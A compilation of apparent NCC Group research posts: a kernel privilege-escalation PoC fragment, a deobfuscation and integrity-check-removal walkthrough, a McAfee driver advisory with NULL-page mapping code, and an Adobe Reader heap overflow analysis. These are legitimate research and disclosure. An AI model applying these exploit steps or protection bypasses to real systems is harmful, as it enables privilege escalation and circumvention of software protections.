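    PVOID result = (PVOID)((PUCHAR)kernelBase + ((PUCHAR)userHal - (PUCHAR)user));

    free(mods);
    return result;
}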

The reason I could not reproduce this fully dynamic approach for hal!HaliQuerySystemInformation (calling LoadLibrary(halacpi.dll) and then GetProcAddress(HaliQuerySystemInformation)) and used a hardcoded, fixed, manually precalculated 0x1b940 offset instead, is that the HaliQuerySystemInformation function is not exported by halacpi.dll - whereas GetProcAddress only works for functions that have corresponding entries in the DLL Export Table.

Full PoC

The full PoC I put together can be found here: https://gist.github.com/ewilded/4b9257b552c6c1e2a3af32879f623803.

nt/system shell still running after the exploit process's exit
The original HalDispatchTable+0x4 restored after exploit execution

A Look At Some Real-World Obfuscation Techniques

Among the variety of penetration testing engagements NCC Group delivers, some – often within the gaming industry – require performing the assignment in a blackbox fashion against an obfuscated binary, and the client’s priorities revolve more around evaluating the strength of their obfuscation against content protection violations, rather than exercising the application’s security boundaries.

The following post aims at providing insight into the tools and methods used to conduct those engagements using real-world examples. While this approach allows for describing techniques employed by actual protections, only a subset of the material can be explicitly listed here (see disclaimer for more information).

Unpacking Phase

When first attempting to analyze a hostile binary, the first step is generally to unpack the actual contents of its sections from runtime memory. The standard way to proceed consists of letting the executable run until the unpacking stub has finished deobfuscating, decompressing and/or deciphering the executable’s sections. The unpacked binary can then be reconstructed by dumping the recovered sections into a new executable and (usually) rebuilding the imports section from the recovered IAT (Import Address Table).

This can be accomplished in many ways including:

  • Debugging manually and using plugins such as Scylla to reconstruct the imports section
  • Python scripting leveraging Windows debugging libraries like winappdbg and executable file format libraries like pefile
  • Intel Pintools dynamically instrumenting the binary at run-time (JIT instrumentation mode recommended to avoid integrity checks)

Expectedly, these approaches can be thwarted by anti-debug mechanisms and various detection mechanisms which, in turn, can be evaded via more debugger plugins such as ScyllaHide or by implementing various hooks such as those highlighted by ICPin. Finally, the original entry point of the application can usually be identified by its immediate calls to the C/C++ runtime’s canonical initialization functions such as _initterm() and _initterm_e().

While the dynamic method is usually sufficient, the samples below highlight two automated implementations that were used successfully: a Python script handling a simple packer that did not require import rebuilding, and a more versatile (albeit slower) dynamic execution engine implementation allowing a more granular approach, fit to uncover specific behaviors.

Control Flow Flattening

Once unpacked, the binary under investigation exposes a number of functions obfuscated using control flow graph (CFG) flattening, a variety of antidebug mechanisms, and integrity checks. Those can be identified as a preliminary step by running the binary instrumented under ICPin (sample output below).

Overview

When disassembled, the CFG of each obfuscated function exhibits the pattern below: a state variable has been added to the original flow, which gets initialized in the function prologue and the branching structure has been replaced by a loop of pointer table-based dispatchers (highlighted in white).

Each dispatch loop level contains between 2 and 16 indirect jumps to basic blocks (BBLs) actually implementing the function’s logic.

There are a number of ways to approach this problem, but the CFG flattening implemented here can be handled using a fully symbolic approach that does not require a dynamic engine, nor a real memory context. The first step is, for each function, to identify the loop using a loop-matching algorithm, then run a symbolic engine through it, iterating over all the possible index values and building an index-to-offset map, with the original function’s logic implemented within the BBL-chains located between the blocks belonging to the loop:

Real Destination(s) Recovery

The following steps consist of leveraging the index-to-offset map to reconnect these BBL-chains with each other, and recreate the original control-flow graph. As can be seen in the captures below, the value of the state variable is set using instruction-level obfuscation. Some BBL-chains only bear a static possible destination which can be swiftly evaluated.

For dynamic-destination BBL-chains, once the register used as a state variable has been identified, the next step is to identify the determinant symbols, i.e., the registers and memory locations (globals or local variables) that affect the value of the state register when re-entering the dispatch loop.

This can be accomplished by computing the intermediate language representation (IR) of the assembly flow graph (or BBLs) and building a dependency graph from it. Here we are taking advantage of a limitation of the obfuscator: the determinants for multi-destination BBLs are always contained within the BBL subgraph formed between two dispatchers.

With those determinants identified, the task that remains is to identify what condition these determinants are fulfilling, as well as what destinations in code we jump to once the condition has been evaluated. The Z3 SMT solver from Microsoft is traditionally used around dynamic symbolic engines (DSE) as a means of finding input values leading to new paths. Here, the deobfuscator uses its capabilities to identify the type of comparison the instructions are replacing.

For example, for the equal pattern, the code asks Z3 if 2 valid destination indexes (D1 and D2) exist such that:

  • If the determinants are equal, the value of the state register is equal to D1
  • If the determinants are different, the value of the state register is equal to D2

Finally, the corresponding instruction can be assembled and patched into the assembly, replacing the identified patterns with equivalent assembly sequences such as the ones below, where

  • mod0 and mod1 are the identified determinants
  • #SREG is the state register, now free to be repurposed to store the value of one of the determinants (which may be stored in memory)
  • #OFFSET0 is the offset corresponding to the destination index if the tested condition is true
  • #OFFSET1 is the offset corresponding to the destination index if the tested condition is false
class EqualPattern(Pattern):
assembly = '''
MOV   #SREG, mod0
CMP   #SREG, mod1
JZ    #OFFSET0
NOP
JMP   #OFFSET1
'''

class UnsignedGreaterPattern(Pattern):
assembly = '''
MOV   #SREG, mod0
CMP   #SREG, mod1
JA    #OFFSET0
NOP
JMP   #OFFSET1
'''

class SignedGreaterPattern(Pattern):
assembly = '''
MOV   #SREG, mod0
CMP   #SREG, mod1
JG    #OFFSET0
NOP
JMP   #OFFSET1
'''

The resulting CFG, since every original block has been reattached directly to its real target(s), effectively separates the dispatch loop from the significant BBLs. Below is the result of this first pass against a sample function:

This approach does not aim at handling all possible theoretical cases; it takes advantage of the fact that the obfuscator only transforms a small set of arithmetic operations.

Integrity Check Removal

Once the flow graph has been unflattened, the next step is to remove the integrity checks. These can mostly be identified using a simple graph matching algorithm (using Miasm’s “MatchGraphJoker” expressions) which also constitutes a weakness in the obfuscator. In order to account for some corner cases, the detection logic implemented here involves symbolically executing the identified loop candidates, and recording their reads against the .text section in order to provide a robust identification.

On the above graph, the hash verification flow is highlighted in yellow and the failure case (in this case, sending the execution to an address with invalid instructions) in red. Once the loop has been positively identified, the script simply links the green basic blocks to remove the hash check entirely.

“Dead” Instructions Removal

The resulting assembly is unflattened, and does not include the integrity checks anymore, but still includes a number of “dead” instructions which do not have any effect on the function’s logic and can be removed. For example, in the sample below, the value of EAX is not accessed between its first assignment and its subsequent ones. Consequently, the first assignment of EAX, regardless of the path taken, can be safely removed without altering the function’s logic.

start:
    MOV   EAX, 0x1234
    TEST  EBX, EBX
    JNZ   path1
path0:
    XOR   EAX, EAX
path1:
    MOV   EAX, 0x1

Using a dependency graph (depgraph) again, but this time, keeping a map of ASM <-> IR (one-to-many), the following pass removes the assembly instructions for which the depgraph has determined all corresponding IRs are non-performative.

Finally, the framework-provided simplifications, such as bbl-merger, can be applied automatically to each block bearing a single successor, provided the successor only has a single predecessor. The error paths can also be identified and “cauterized”, which should be a no-op (since they should never be executed) but smooths the rebuilding of the executable.

A Note On Antidebug Mechanisms

While a number of canonical anti-debug techniques were identified in the samples, only a few will be covered here, as the techniques are well known and can largely be ignored.

PEB->isBeingDebugged

In the example below, the function checks the PEB for isBeingDebugged (offset 0x2) and sends the execution into a stack-mangling loop before continuing execution, which leads to a certain crash, obfuscating the context from a naive debugging attempt.
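
The check itself is equivalent to the following user-mode snippet (x64 shown; on x86 the PEB pointer sits at fs:[0x30] instead):

#include <windows.h>
#include <intrin.h>

// Read PEB->BeingDebugged (offset 0x2) directly, the same way the obfuscated
// code does, without going through IsDebuggerPresent().
int IsBeingDebugged(void)
{
    unsigned char *peb = (unsigned char *)__readgsqword(0x60); // gs:[0x60] holds the PEB on x64
    return peb[0x2];
}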

Debug Interrupts

Another mechanism involves debug software interrupts and vectored exception handlers, but is rendered easily comprehensible once the function has been processed. The code first sets two local variables to pseudorandom constant values, then registers a vectored exception handler via a call to AddVectoredExceptionHandler. An INT 0x3 (debug interrupt) instruction is then executed (via the indirect call to ISSUE_INT3_FN), but encoded using the long form of the instruction: 0xCD 0x03.

After executing the INT 0x3 instruction, the code flow is resumed in the exception handler as can be seen below.

If the exception code from the EXCEPTION_RECORD structure is a debug breakpoint, a bitwise NOT is applied to one of the constants stored on the stack. Additionally, the Windows interrupt handler treats every debug exception as if it stemmed from executing the short version of the instruction (0xCC), so were a debugger to intercept the exception, those two elements would need to be taken into consideration in order for execution to continue normally.

Upon continuing execution, a small arithmetic operation checks that the addition of one of the initially set constants (0x8A7B7A99) and a third one (0x60D7B571) is equal to the bitwise NOT of the second initial constant (0x14ACCFF5), which is the operation performed by the exception handler.

0x8A7B7A99 + 0x60D7B571 == 0xEB53300A == ~0x14ACCFF5

A variant using the same exception handler operates in a very similar manner, substituting the debug exception with an access violation triggered via allocating a guard page and accessing it (this behavior is also flagged by ICPin).

Rebuilding The Executable

Once all the passes have been applied to all the obfuscated functions, the patches can be recorded, then applied to a free area of the new executable, and a JUMP is inserted at the function’s original offset.

Example of a function before and after deobfuscation:

Obfuscator’s Integrity Checking Internals

It is generally unnecessary to dig into the details of an obfuscator’s integrity checking mechanism; most times, as described in the previous example, identifying its location or expected result is sufficient to disable it. However, this provides a good opportunity to demonstrate the use of a DSE to address an obfuscator’s internals – theoretically its most hardened part.

ICPin output immediately highlights a number of code locations performing incremental reads on addresses in the executable’s .text section. Some manual investigation of these code locations points us to the spot where a function call or branching instruction switches to the obfuscated execution flow. However, there are no clearly defined function frames and the entire set of executed instructions is too large to display in IDA.

In order to get a sense of the execution flow, a simple jitter callback can be used to gather all the executed blocks as the engine runs through the code. Looking at the discovered blocks, it becomes apparent that the code uses conditional instructions to alter the return address on the stack, and hides its real destination with opaque predicates and obfuscated logic.

Starting with that information, it would be possible to take a similar approach as in the previous example and thoroughly rebuild the IR CFG, apply simplifications, and recompile the new assembly using LLVM. However, in this instance, armed with the knowledge that this obfuscated code implements an integrity check, it is advantageous to leverage the capabilities of a DSE.

A CFG of the obfuscated flow can still be roughly computed, by recording every block executed and adding edges based on the tracked destinations. The stock simplifications and SSA form can be used to obtain a graph of the general shape below:

Deciphering The Data Blobs

On a first run attempt, one can observe 8-byte reads from blobs located in two separate memory locations in the .text section, which are then processed through a loop (also conveniently identified by the tracking engine). With the memX symbols representing constants in memory, and blob0 representing the sequentially read input from a 32bit ciphertext blob, the symbolic values extracted from the blobs look as follows, looping 32 times:

res = (blob0 + ((mem1 ^ mem2)*mul) + sh32l((mem1 ^ mem2), 0x5)) ^ (mem3 + sh32l(blob0, 0x4)) ^ (mem4 + sh32r(blob0,  0x5))

Inspection of the values stored at memory locations mem1 and mem2 reveals the following constants:

@32[0x1400DF45A]: 0xA46D3BBF
@32[0x14014E859]: 0x3A5A4206

0xA46D3BBF^0x3A5A4206 = 0x9E3779B9

0x9E3779B9 is a well-known nothing up my sleeve number, based on the golden ratio, and notably used by RC5. In this instance however, the expression points at another Feistel cipher, TEA, or Tiny Encryption Algorithm:

void decrypt (uint32_t v[2], const uint32_t k[4]) {
    uint32_t v0=v[0], v1=v[1], sum=0xC6EF3720, i;  /* set up; sum is 32*delta */
    uint32_t delta=0x9E3779B9;                     /* a key schedule constant */
    uint32_t k0=k[0], k1=k[1], k2=k[2], k3=k[3];   /* cache key */
    for (i=0; i<32; i++) {                         /* basic cycle start */
        v1 -= ((v0<<4) + k2) ^ (v0 + sum) ^ ((v0>>5) + k3);
        v0 -= ((v1<<4) + k0) ^ (v1 + sum) ^ ((v1>>5) + k1);
        sum -= delta;
    }
    v[0]=v0; v[1]=v1;
}

Consequently, the 128-bit key can be trivially recovered from the remaining memory locations identified by the symbolic engine.

Extracting The Offset Ranges

With the decryption cipher identified, the next step is to reverse the logic of computing ranges of memory to be hashed. Here again, the memory tracking execution engine proves useful and provides two data points of interest:
– The binary is not hashed in a continuous way; rather, 8-byte offsets are regularly skipped
– A memory region is iteratively accessed before each hashing

Using a DSE such as this one, symbolizing the first two bytes of the memory region and letting it run all the way to the address of the instruction that reads memory, we obtain the output below (edited for clarity):

-- MEM ACCESS: {BLOB0 & 0x7F 0 8, 0x0 8 64} + 0x140000000
# {BLOB0 0 8, 0x0 8 32} & 0x80 = 0x0
...

-- MEM ACCESS: {(({BLOB1 0 8, 0x0 8 32} & 0x7F) << 0x7) | {BLOB0 & 0x7F 0 8, 0x0 8 32} 0 32, 0x0 32 64} + 0x140000000
# 0x0 = ({BLOB0 0 8, 0x0 8 32} & 0x80)?(0x0,0x1)
# ((({BLOB1 0 8, 0x0 8 32} & 0x7F) << 0x7) | {BLOB0 & 0x7F 0 8, 0x0 8 32}) == 0xFFFFFFFF = 0x0
...

The accessed memory’s symbolic addresses alone provide a clear hint at the encoding: only 7 of the bits of each symbolized byte are used to compute the address. Looking further into the accesses, the second byte is only used if the first byte’s most significant bit is set, which tracks with a simple unsigned integer base-128 compression. Essentially, the algorithm reads one byte at a time, using 7 bits for data, and using the top bit to indicate whether more bytes should be read to compute the final value.
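
In C, a decoder for one such value is only a few lines (equivalent in spirit to the parse_ranges() helper shown at the end of this post):

#include <stddef.h>
#include <stdint.h>

// Decode one unsigned base-128 value: 7 data bits per byte, the top bit set
// means "another byte follows". Returns the number of input bytes consumed.
size_t decode_uleb128(const uint8_t *in, uint32_t *out)
{
    uint32_t value = 0;
    size_t i = 0;

    do {
        value |= (uint32_t)(in[i] & 0x7F) << (7 * i);
    } while (in[i++] & 0x80);

    *out = value;
    return i;
}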

Identifying The Hashing Algorithm

In order to establish whether the integrity checking implements a known hashing algorithm, despite the static disassembly showing no sign of known constants, a memory tracking symbolic execution engine can be used to investigate one level deeper. Early in the execution (running the obfuscated code in its entirety may take a long time), one can observe the following pattern, revealing well-known SHA1 constants.

0x140E34F50 READ @32[0x140D73B5D]: 0x96F977D0
0x140E34F52 READ @32[0x140B1C599]: 0xF1BC54D1
0x140E34F54 READ @32[0x13FC70]: 0x0
0x140E34F5A READ @64[0x13FCA0]: 0x13FCD0
0x140E34F5E WRITE @32[0x13FCD0]: 0x67452301

0x140E34F50 READ @32[0x140D73B61]: 0x752ED515
0x140E34F52 READ @32[0x140B1C59D]: 0x9AE37E9C
0x140E34F54 READ @32[0x13FC70]: 0x1
0x140E34F5A READ @64[0x13FCA0]: 0x13FCD0
0x140E34F5E WRITE @32[0x13FCD4]: 0xEFCDAB89

0x140E34F50 READ @32[0x140D73B65]: 0xF9396DD4
0x140E34F52 READ @32[0x140B1C5A1]: 0x6183B12A
0x140E34F54 READ @32[0x13FC70]: 0x2
0x140E34F5A READ @64[0x13FCA0]: 0x13FCD0
0x140E34F5E WRITE @32[0x13FCD8]: 0x98BADCFE

0x140E34F50 READ @32[0x140D73B69]: 0x2A1B81B5
0x140E34F52 READ @32[0x140B1C5A5]: 0x3A29D5C3
0x140E34F54 READ @32[0x13FC70]: 0x3
0x140E34F5A READ @64[0x13FCA0]: 0x13FCD0
0x140E34F5E WRITE @32[0x13FCDC]: 0x10325476

0x140E34F50 READ @32[0x140D73B6D]: 0xFB95EF83
0x140E34F52 READ @32[0x140B1C5A9]: 0x38470E73
0x140E34F54 READ @32[0x13FC70]: 0x4
0x140E34F5A READ @64[0x13FCA0]: 0x13FCD0
0x140E34F5E WRITE @32[0x13FCE0]: 0xC3D2E1F0

Examining the relevant code addresses (as seen in the SSA notation below), it becomes evident that, in order to compute the necessary hash constants, a simple XOR instruction is used with two otherwise meaningless constants, rendering algorithm identification less obvious from static analysis alone.

And the expected SHA1 constants are stored on the stack:

0x96F977D0^0xF1BC54D1 ==> 0x67452301
0x752ED515^0x9AE37E9C ==> 0XEFCDAB89
0xF9396DD4^0x6183B12A ==> 0X98BADCFE
0x2A1B81B5^0x3A29D5C3 ==> 0X10325476
0xFB95EF83^0x38470E73 ==> 0XC3D2E1F0

Additionally, the SHA1 algorithm steps can be further observed in the SSA graph, such as the ROTL-5 and ROTL-30 operations, plainly visible in the IL below.

Final Results

The entire integrity-checking logic recovered from the obfuscator, reimplemented in Python below, was verified to produce the same digest as when running under the debugger or a straightforward LLVM jitter. The parse_ranges() function handles the encoding, while the accumulate_bytes() generator handles the deciphering and processing of both the range blobs and the skipped-offset blobs.

Once the hashing of the memory ranges dictated by the offset table has completed, the 64bit values located at the offsets deciphered from the second blob are subsequently hashed. Finally, once the computed hash value has been successfully compared to the valid digest stored within the RWX .text section of the executable, the execution flow is deemed secure and the obfuscator proceeds to decipher protected functions within the .text section.

import hashlib
import struct
from sys import argv

# PE (a PE parser exposing virt2off/rva2off) and Tea (a TEA cipher implementation)
# are helper classes from the author's tooling and are not shown here.

def parse_ranges(table):
  ranges = []
  rangevals = []
  tmp = []
  for byte in table:
    tmp.append(byte)
    if not byte&0x80:
      val = 0
      for i,b in enumerate(tmp):
        val |= (b&0x7F)<<(7*i)
      rangevals.append(val)
      tmp = [] # reset
  offset = 0
  for p in [(rangevals[i], rangevals[i+1]) for i in range(0, len(rangevals), 2)]:
    offset += p[0]
    if offset == 0xFFFFFFFF:
      break
    ranges.append((p[0], p[1]))
    offset += p[1]
  return ranges

def accumulate_bytes(r, s):
  # TEA Key is 128 bits
  dw6 = 0xF866ED75
  dw7 = 0x31CFE1EF
  dw4 = 0x1955A6A0
  dw5 = 0x9880128B
  key = struct.pack('IIII', dw6, dw7, dw4, dw5)
  # Decipher ranges plaintext
  ranges_blob = pe[pe.virt2off(r[0]):pe.virt2off(r[0])+r[1]]
  ranges = parse_ranges(Tea(key).decrypt(ranges_blob))
  # Decipher skipped offsets plaintext (8bytes long)
  skipped_blob = pe[pe.virt2off(s[0]):pe.virt2off(s[0])+s[1]]
  skipped_decrypted = Tea(key).decrypt(skipped_blob)
  skipped = sorted( \
    [int.from_bytes(skipped_decrypted[i:i+4], byteorder='little', signed=False) \
        for i in range(0, len(skipped_decrypted), 4)][:-2:2] \
  )
  skipped_copy = skipped.copy()
  next_skipped = skipped.pop(0)
  current = 0x0
  for rr in ranges:
    current += rr[0]
    size = rr[1]
    # Get the next 8 bytes to skip
    while size and next_skipped and next_skipped < current+size:
      # hash up to the next skipped offset, then jump over the 8 skipped bytes
      blob = pe[pe.rva2off(current):pe.rva2off(current)+(next_skipped-current)]
      size -= (next_skipped-current)+8
      assert size >= 0
      yield blob
      current = next_skipped+8
      next_skipped = skipped.pop(0) if skipped else None
    blob = pe[pe.rva2off(current):pe.rva2off(current)+size]
    yield blob
    current += len(blob)
  # Append the initially skipped offsets
  yield b''.join(pe[pe.rva2off(rva):pe.rva2off(rva)+0x8] for rva in skipped_copy)
  return

def main():
  global pe
  hashvalue = hashlib.sha1()
  hashvalue.update(b'\x7B\x0A\x97\x43')
  with open(argv[1], "rb") as f:
    pe = PE(f.read())
  accumulator = accumulate_bytes((0x140A85B51, 0xFCBCF), (0x1409D7731, 0x12EC8))
  # Get all hashed bytes
  for blob in accumulator:
    hashvalue.update(blob)
  print(f'SHA1 FINAL: {hashvalue.hexdigest()}')
  return

Disclaimer

None of the samples used in this publication were part of an NCC Group engagement. They were selected from publicly available binaries whose obfuscators exhibited features similar to previously encountered ones.

Due to the nature of this material, specific content had to be redacted, and a number of tools that were created as part of this effort could not be shared publicly.

Despite these limitations, the author hopes the technical content shared here is sufficient to provide the reader with a stimulating read.

Technical Advisory – NULL Pointer Dereference in McAfee Drive Encryption (CVE-2021-23893)

Vendor: McAfee
Vendor URL: https://kc.mcafee.com/corporate/index?page=content&id=sb10361
Versions affected: Prior to 7.3.0 HF1
Systems Affected: Windows OSs without NULL page protection 
Author: Balazs Bucsay <balazs.bucsay[ at ]nccgroup[.dot.]com> @xoreipeip
CVE Identifier: CVE-2021-23893
Risk: 8.8 - CWE-269: Improper Privilege Management

Summary

McAfee’s Complete Data Protection package contained the Drive Encryption (DE) software. This software was used to transparently encrypt the drive contents. The versions prior to 7.3.0 HF1 had a vulnerability in the kernel driver MfeEpePC.sys that could be exploited on certain Windows systems for privilege escalation or DoS.

Impact

Privilege Escalation vulnerability in a Windows system driver of McAfee Drive Encryption (DE) prior to 7.3.0 could allow a local non-admin user to gain elevated system privileges via exploiting an unutilized memory buffer.

Details

The Drive Encryption software’s kernel driver was loaded to the kernel at boot time and certain IOCTLs were available for low-privileged users.

One of the available IOCTLs referenced an event that was set to NULL before initialization. If the IOCTL was called at the right time, the procedure used NULL as the event and referenced the non-existent structure on the NULL page.

If the user mapped the NULL page and created a fake structure there that mimicked a real Event structure, it was possible to manipulate certain regions of memory and eventually execute code in the kernel.
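
On the affected Windows versions (those without NULL-page protection), mapping the NULL page from user mode is a well-known step; a hedged sketch of one common approach using ntdll's NtAllocateVirtualMemory is shown below (illustrative, not the exploit code used for this advisory):

#include <windows.h>

typedef LONG (WINAPI *NtAllocateVirtualMemory_t)(HANDLE ProcessHandle, PVOID *BaseAddress,
                                                 ULONG_PTR ZeroBits, PSIZE_T RegionSize,
                                                 ULONG AllocationType, ULONG Protect);

// Map the NULL page so a fake event-like structure can be placed at address 0.
int MapNullPage(void)
{
    NtAllocateVirtualMemory_t pNtAllocateVirtualMemory =
        (NtAllocateVirtualMemory_t)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtAllocateVirtualMemory");
    PVOID  base = (PVOID)1;   // rounded down to page 0 by the kernel
    SIZE_T size = 0x1000;

    LONG status = pNtAllocateVirtualMemory(GetCurrentProcess(), &base, 0, &size,
                                           MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    return status == 0;
}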

Recommendation

Install or update to Drive Encryption 7.3.0 HF1, which has this vulnerability fixed.

Vendor Communication

February 24, 2021: Vulnerability was reported to McAfee

March 9, 2021: McAfee was able to reproduce the crash with the originally provided DoS exploit

October 1, 2021: McAfee released the new version of DE, which fixes the issue

Acknowledgements

Thanks to Cedric Halbronn for his support during the development of the exploit.

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity. 

Published date:  October 4, 2021

Written by:  Balazs Bucsay

Analysis of a Heap Buffer-Overflow Vulnerability in Adobe Acrobat Reader DC

By Sergi Martinez

In late June, we published a blog post containing analysis of exploitation of a heap-buffer overflow vulnerability in Adobe Reader, a vulnerability that we thought corresponded to CVE-2021-21017. The starting point for the research was a publicly posted proof-of-concept containing root-cause analysis. Soon after publishing the blog post, we learnt that the CVE was not authoritative and that the publicly posted proof-of-concept was an 0day, even if the 0day could not be reproduced in the patched version. We promptly pulled the blog post and began investigating.

Further research showed that the vulnerability continued to exist in the latest version and was exploitable with only a few changes to our exploit. We reported our findings to Adobe. Adobe assigned CVE-2021-39863 to this vulnerability and released an advisory and patched versions of their products on September 14th, 2021.

Since the exploits were very similar, this post largely overlaps with the blog post previously removed. It analyzes and exploits CVE-2021-39863, a heap buffer overflow in Adobe Acrobat Reader DC up to and including version 2021.005.20060.

This post is similar to our previous post on Adobe Acrobat Reader, which exploits a use-after-free vulnerability that also occurs while processing Unicode and ANSI strings.

Overview

A heap buffer overflow occurs during the concatenation of an ANSI-encoded relative URL to a PDF document’s base URL. This happens when an embedded JavaScript script calls functions located in the IA32.api module, which handles internet access, such as this.submitForm and app.launchURL. When these functions are called with a relative URL whose encoding differs from that of the PDF’s base URL, the relative URL is treated as if it had the same encoding as the base URL. This can result in copying twice the number of bytes of the source ANSI string (the relative URL) into a properly sized destination buffer, leading to both an out-of-bounds read and a heap buffer overflow.

CVE-2021-39863

Acrobat Reader has a built-in JavaScript engine based on Mozilla’s SpiderMonkey. Embedded JavaScript code in PDF files is processed and executed by the EScript.api module in Adobe Reader.

Internet access related operations are handled by the IA32.api module. The vulnerability occurs within this module when a URL is built by concatenating the PDF document’s base URL and a relative URL. The relative URL is specified as a parameter in calls to JavaScript functions that trigger any kind of internet access, such as this.submitForm and app.launchURL. In particular, the vulnerability occurs when the encodings of the two strings differ.

The concatenation of both strings is done by allocating enough memory to fit the final string. The computation of the length of each string correctly takes into account whether it is ANSI or Unicode. However, when the concatenation occurs, only the base URL's encoding is checked and the relative URL is assumed to have the same encoding as the base URL. When the relative URL is ANSI encoded, the code that copies bytes from the relative URL string buffer into the allocated buffer copies two bytes at a time instead of one. This leads to reading a number of bytes equal to the length of the relative URL from outside the source buffer and copying them beyond the bounds of the destination buffer, resulting in both an out-of-bounds read and an out-of-bounds write.
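
Before walking through the decompiled listings in the next section, the following snippet is a simplified reconstruction of the flawed pattern (illustrative only, not Adobe's actual code): the allocation size is computed from encoding-aware lengths, but the append loop assumes the relative URL shares the base URL's Unicode encoding and therefore consumes two bytes per ANSI character.

#include <stdlib.h>
#include <string.h>

/* Simplified reconstruction of the flawed concatenation (illustrative only):
   base is UTF-16BE (starts with 0xFE 0xFF), rel is ANSI. */
char *concat_urls(const char *base, size_t base_len,
                  const char *rel, size_t rel_len)
{
    /* The length computation is encoding-aware and correct. */
    char *out = calloc(1, base_len + rel_len + 2);
    if (!out)
        return NULL;
    memcpy(out, base, base_len);

    /* Bug: because the destination is Unicode, the append loop assumes the
       relative URL is Unicode too and walks it two bytes at a time, looking
       for a two-byte terminator. For an ANSI string this reads past its
       single-byte terminator and keeps copying adjacent heap data, writing
       roughly rel_len bytes past the end of out. */
    char *dst = out + base_len;
    const char *src = rel;
    for (;;) {
        char hi = *src++;
        char lo = *src++;   /* out-of-bounds read once hi hits the ANSI terminator */
        *dst++ = hi;        /* out-of-bounds write once dst passes the allocation */
        *dst++ = lo;
        if (hi == 0 && lo == 0)
            break;
    }
    return out;
}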

Code Analysis

The following code blocks show the affected parts of methods relevant to this vulnerability. Code snippets are demarcated by reference marks denoted by [N]. Lines not relevant to this vulnerability are replaced by a [Truncated] marker.

All code listings show decompiled C code; source code is not available in the affected product. Structure definitions are obtained by reverse engineering and may not accurately reflect structures defined in the source code.

The following function is called when a relative URL needs to be concatenated to a base URL. Aside from the concatenation it also checks that both URLs are valid.

__int16 __cdecl sub_25817D70(wchar_t *Source, CHAR *lpString, char *String, _DWORD *a4, int *a5)
{
  __int16 v5; // di
  wchar_t *v6; // ebx
  CHAR *v7; // eax
  CHAR v8; // dl
  __int64 v9; // rax
  wchar_t *v10; // ecx
  __int64 v11; // rax
  int v12; // eax
  int v13; // eax
  int v14; // eax

[Truncated]

  v77 = 0;
  v76 = 0;
  v5 = 1;
  *(_QWORD *)v78 = 0i64;
  *(_QWORD *)iMaxLength = 0i64;
  v6 = 0;
  v49 = 0;
  v62 = 0;
  v74 = 0;
  if ( !a5 )
    return 0;
  *a5 = 0;
  v7 = lpString;

[1]

  if ( lpString && *lpString && (v8 = lpString[1]) != 0 && *lpString == (CHAR)0xFE && v8 == (CHAR)0xFF )
  {

[2]

    v9 = sub_2581890C(lpString);
    v78[1] = v9;
    if ( (HIDWORD(v9) & (unsigned int)v9) == -1 )
    {
LABEL_9:
      *a5 = -2;
      return 0;
    }
    v7 = lpString;
  }
  else
  {

[3]

    v78[1] = v78[0];
  }
  v10 = Source;
  if ( !Source || !v7 || !String || !a4 )
  {
    *a5 = -2;
    goto LABEL_86;
  }

[4]

  if ( *(_BYTE *)Source != 0xFE )
    goto LABEL_25;
  if ( *((_BYTE *)Source + 1) == 0xFF )
  {
    v11 = sub_2581890C(Source);
    iMaxLength[1] = v11;
    if ( (HIDWORD(v11) & (unsigned int)v11) == -1 )
      goto LABEL_9;
    v10 = Source;
    v12 = iMaxLength[1];
  }
  else
  {
    v12 = iMaxLength[0];
  }

[5]

  if ( *(_BYTE *)v10 == 0xFE && *((_BYTE *)v10 + 1) == 0xFF )
  {
    v13 = v12 + 2;
  }
  else
  {
LABEL_25:
    v14 = sub_25802A44((LPCSTR)v10);
    v10 = v37;
    v13 = v14 + 1;
  }
  iMaxLength[1] = v13;

[6]

  v15 = (CHAR *)sub_25802CD5(v10, 1, v13);
  v77 = v15;
  if ( !v15 )
  {
    *a5 = -7;
    return 0;
  }

[7]

  sub_25802D98(v38, (wchar_t *)v15, Source, iMaxLength[1]);

[8]

  if ( *lpString == (CHAR)0xFE && lpString[1] == (CHAR)0xFF )
  {
    v17 = v78[1] + 2;
  }
  else
  {
    v18 = sub_25802A44(lpString);
    v16 = v39;
    v17 = v18 + 1;
  }
  v78[1] = v17;

[9]

  v19 = (CHAR *)sub_25802CD5(v16, 1, v17);
  v76 = v19;
  if ( !v19 )
  {
    *a5 = -7;
LABEL_86:
    v5 = 0;
    goto LABEL_87;
  }

[10]

  sub_25802D98(v40, (wchar_t *)v19, (wchar_t *)lpString, v78[1]);
  if ( !(unsigned __int16)sub_258033CD(v77, iMaxLength[1], a5) || !(unsigned __int16)sub_258033CD(v76, v78[1], a5) )
    goto LABEL_86;

[11]

  v20 = sub_25802400(v77, v42);
  if ( v20 || (v20 = sub_25802400(v76, v50)) != 0 )
  {
    *a5 = v20;
    goto LABEL_86;
  }
  if ( !*(_BYTE *)Source || (v21 = v42[0], v50[0] != 5) && v50[0] != v42[0] )
  {
    v35 = sub_25802FAC(v50);
    v23 = a4;
    v24 = v35 + 1;
    if ( v35 + 1 > *a4 )
      goto LABEL_44;
    *a4 = v35;
    v25 = v50;
    goto LABEL_82;
  }
  if ( *lpString )
  {
    v26 = v55;
    v63[1] = v42[1];
    v63[2] = v42[2];
    v27 = v51;
    v63[0] = v42[0];
    v73 = 0i64;
    if ( !v51 && !v53 && !v55 )
    {
      if ( (unsigned __int16)sub_25803155(v50) )
      {
        v28 = v44;
        v64 = v42[3];
        v65 = v42[4];
        v66 = v42[5];
        v67 = v42[6];
        v29 = v43;
        if ( v49 == 1 )
        {
          v29 = v43 + 2;
          v28 = v44 - 1;
          v43 += 2;
          --v44;
        }
        v69 = v28;
        v68 = v29;
        v70 = v45;
        if ( v58 )
        {
          if ( *v59 != 47 )
          {

[12]

            v6 = (wchar_t *)sub_25802CD5((wchar_t *)(v58 + 1), 1, v58 + 1 + v46);
            if ( !v6 )
            {
              v23 = a4;
              v24 = v58 + v46 + 1;
              goto LABEL_44;
            }
            if ( v46 )
            {

[13]

              sub_25802D98(v41, v6, v47, v46 + 1);
              if ( *((_BYTE *)v6 + v46 - 1) != 47 )
              {
                v31 = sub_25818D6E(v30, (char *)v6, 47);
                if ( v31 )
                  *(_BYTE *)(v31 + 1) = 0;
                else
                  *(_BYTE *)v6 = 0;
              }
            }
